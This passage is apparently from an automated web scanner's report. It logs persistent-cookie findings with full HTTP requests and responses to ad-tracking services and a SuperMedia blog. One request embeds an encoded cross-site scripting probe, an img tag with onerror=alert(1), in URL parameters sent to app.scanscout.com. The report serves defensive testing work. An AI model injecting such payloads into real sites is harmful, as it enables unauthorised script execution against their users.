Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/adStreamJSController.xml?a=getadscheduleforcontent&format=vast&fetchads=overlay&ss_partnerId=626&ss_height=360&ss_width=480&asVersion=3&jsa=Y&blacklist=&ss_mediaCategories=&ss_mediaDescription=&ss_mediaId=v18978294NGnK88j8&ss_mediaKeywords=&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; behavioralSegments=29_110203|32_110203|263_110203
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1 Host: appleid.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p59844736&PRAd=60056&AR_C=656 HTTP/1.1 Host: ar.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Thu, 03 Feb 2011 22:03:49 GMT Content-Type: application/x-javascript Connection: close Vary: Accept-Encoding Set-Cookie: ar_p59844736=exp=1&initExp=Thu Feb 3 22:03:49 2011&recExp=Thu Feb 3 22:03:49 2011&prad=60056&arc=656&; expires=Wed 04-May-2011 22:03:49 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296770629; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u/getuid/ HTTP/1.1 Host: audience.visiblemeasures.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056; sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:50 GMT P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV" Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 22:03:50 GMT Set-Cookie: sid=C5F474F2682AA8DAE8075A6889492B4928B445B7;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 22:33:50 GMT Content-Type: text/plain Content-Length: 89 Server: Jetty(7.x.y-SNAPSHOT) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /u/getuid/?nocache=0%2E6689167399890721&a=715b8c3a075d11dea9710019b9f1584b HTTP/1.1 Host: audience.visiblemeasures.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:08:03 GMT P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV" Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 21:08:03 GMT Set-Cookie: sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 21:38:03 GMT Content-Type: text/plain Content-Length: 89 Server: Jetty(7.x.y-SNAPSHOT)
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=8&c2=6036036&rn=439947884&c7=http%3A%2F%2Fcore.videoegg.com%2Feap%2F12368%2Fhtml%2Fjstags.html%3FCCID%3D0%26r%3D0.3821160274092108&c3=1&c9=http%3A%2F%2Fwww.tucows.com%2Fvideoegg%2Fad.html&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Thu, 03 Feb 2011 20:51:19 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 20:51:19 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035784&c3=0&c4=2331.7717.9237.23663&c5=4871&c6=f978e9b0-271c-47b8-9a97-caba692f0bb2&c10=11073.35211.76599&c15=&cj=1&rn=5575236558291927040 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Thu, 03 Feb 2011 21:59:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 21:59:56 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Referer: http://www.supermedia.com/social-responsibility/corporate-governance Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/2011-changes/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:18 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Changes to Look for in 2011 | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:26 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:26 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title> Allowing Employees to Work Remotely Could be a Win-Win for Your Business | SuperMedia Blog | ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/getting-in-shape-tips/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:18 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>3 Tips For Getting in Shape While Running a Business | SuperMedia Blog | SuperMedia.com</titl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/how-to-use-op-ed-pages-to-promote-your-business/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:16 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:16 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>How to Use Op-Ed Pages to Promote Your Business | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/starting-a-social-enterprise/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:28 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:28 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Starting A Social Enterprise | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/videos-will-help-your-small-business/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:17 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:17 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>How Videos Will Help Your Small Business | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/build-brand/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Upping Your Brand in 2011 | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/go-marketing/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Go Guerrilla with Your Marketing | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/planning-appreciation-events/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Planning Appreciation Events | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/02/should-you-loan-money-to-employees/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:15 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Should You Loan Money to Your Employees? | SuperMedia Blog | SuperMedia.com</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:30 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:30 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/news/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:31 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:31 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/newsletters/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:32 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:32 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/press-releases/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:33 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:33 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /archives/tips/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:34 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment_form.php HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:34 GMT Server: Unspecified Content-Length: 37 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment_html.php HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:34 GMT Server: Unspecified Content-Length: 51 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:34 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763697|check#true#1296761897; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:36:43 GMT Server: Unspecified Cteonnt-Length: 328 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:43 GMT;path=/ Cache-Control: private Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> <p>Add ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
